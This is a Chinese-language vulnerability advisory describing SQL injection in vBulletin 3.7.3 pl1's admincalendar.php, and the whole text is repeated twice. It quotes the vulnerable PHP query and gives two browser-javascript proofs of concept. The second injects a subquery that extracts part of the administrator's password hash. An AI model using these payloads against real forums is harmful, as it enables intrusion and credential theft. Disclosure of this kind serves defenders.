vBulletin admincp/admincalendar.php模块SQL注入漏洞
发布日期:2008-11-17
更新日期:2008-11-18
受影响系统:
VBulletin VBulletin 3.7.3 pl1
描述:BUGTRAQ ID: 32348
vBulletin是一款开放源代码的PHP论坛程序。
vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数:
-------------------[original source code]------------------
if($_POST[%26#39;do%26#39;] == %26#39;saveholiday%26#39;)
{
$vbulletin->input->clean_array_gpc(%26#39;p%26#39;, array(
%26#39;holidayid%26#39; => TYPE_INT,
%26#39;holidayinfo%26#39; => TYPE_ARRAY,
%26#39;month1%26#39; => TYPE_INT,
%26#39;day1%26#39; => TYPE_INT,
%26#39;month2%26#39; => TYPE_INT,
%26#39;day2%26#39; => TYPE_INT,
%26#39;period%26#39; => TYPE_INT,
%26#39;title%26#39; => TYPE_STR,
%26#39;description%26#39; => TYPE_STR,
));
..
$db->query_write("
UPDATE " . TABLE_PREFIX . "holiday
SET allowsmilies = " . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;allowsmilies%26#39;] . ",
recuroption = %26#39;" . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;recuroption%26#39;] . "%26#39;,
recurring = " . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;recurring%26#39;] . "
WHERE holidayid = " . $vbulletin->GPC[%26#39;holidayid%26#39;]
);
------------------[/original source code]------------------
可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo,这允许远程攻击者通过提交恶意请求执行SQL注入攻击。
<*来源:Janek Vind (come2waraxe@yahoo.com)
链接:http://marc.info/?l=bugtraq%26amp;m=122693915030370%26amp;w=2
http://secunia.com/advisories/32735/
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>PoC #1
以管理员身份登录并打开假日管理器界面:
http://localhost/vbulletin373pl1/admi ... ndar.php?do=updateholiday
以任意内容填充title字段,然后通过浏览器URL栏运行以下javascript:
javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,waraxe=1";document.cpform.submit();
PoC #2
以管理员身份登录并打开假日管理器界面。填充title字段然后执行以下javascript:
javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,recuroption=CONCAT(%26#39;|%26#39;,(SELECT SUBSTR(password,1,5) FROM vb_user WHERE userid=1))";
document.cpform.submit();
建议:厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.vbulletin.com/
发布日期:2008-11-17
更新日期:2008-11-18
受影响系统:
VBulletin VBulletin 3.7.3 pl1
描述:BUGTRAQ ID: 32348
vBulletin是一款开放源代码的PHP论坛程序。
vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数:
-------------------[original source code]------------------
if($_POST[%26#39;do%26#39;] == %26#39;saveholiday%26#39;)
{
$vbulletin->input->clean_array_gpc(%26#39;p%26#39;, array(
%26#39;holidayid%26#39; => TYPE_INT,
%26#39;holidayinfo%26#39; => TYPE_ARRAY,
%26#39;month1%26#39; => TYPE_INT,
%26#39;day1%26#39; => TYPE_INT,
%26#39;month2%26#39; => TYPE_INT,
%26#39;day2%26#39; => TYPE_INT,
%26#39;period%26#39; => TYPE_INT,
%26#39;title%26#39; => TYPE_STR,
%26#39;description%26#39; => TYPE_STR,
));
..
$db->query_write("
UPDATE " . TABLE_PREFIX . "holiday
SET allowsmilies = " . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;allowsmilies%26#39;] . ",
recuroption = %26#39;" . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;recuroption%26#39;] . "%26#39;,
recurring = " . $vbulletin->GPC[%26#39;holidayinfo%26#39;][%26#39;recurring%26#39;] . "
WHERE holidayid = " . $vbulletin->GPC[%26#39;holidayid%26#39;]
);
------------------[/original source code]------------------
可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo,这允许远程攻击者通过提交恶意请求执行SQL注入攻击。
<*来源:Janek Vind (come2waraxe@yahoo.com)
链接:http://marc.info/?l=bugtraq%26amp;m=122693915030370%26amp;w=2
http://secunia.com/advisories/32735/
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>PoC #1
以管理员身份登录并打开假日管理器界面:
http://localhost/vbulletin373pl1/admi ... ndar.php?do=updateholiday
以任意内容填充title字段,然后通过浏览器URL栏运行以下javascript:
javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,waraxe=1";document.cpform.submit();
PoC #2
以管理员身份登录并打开假日管理器界面。填充title字段然后执行以下javascript:
javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,recuroption=CONCAT(%26#39;|%26#39;,(SELECT SUBSTR(password,1,5) FROM vb_user WHERE userid=1))";
document.cpform.submit();
建议:厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.vbulletin.com/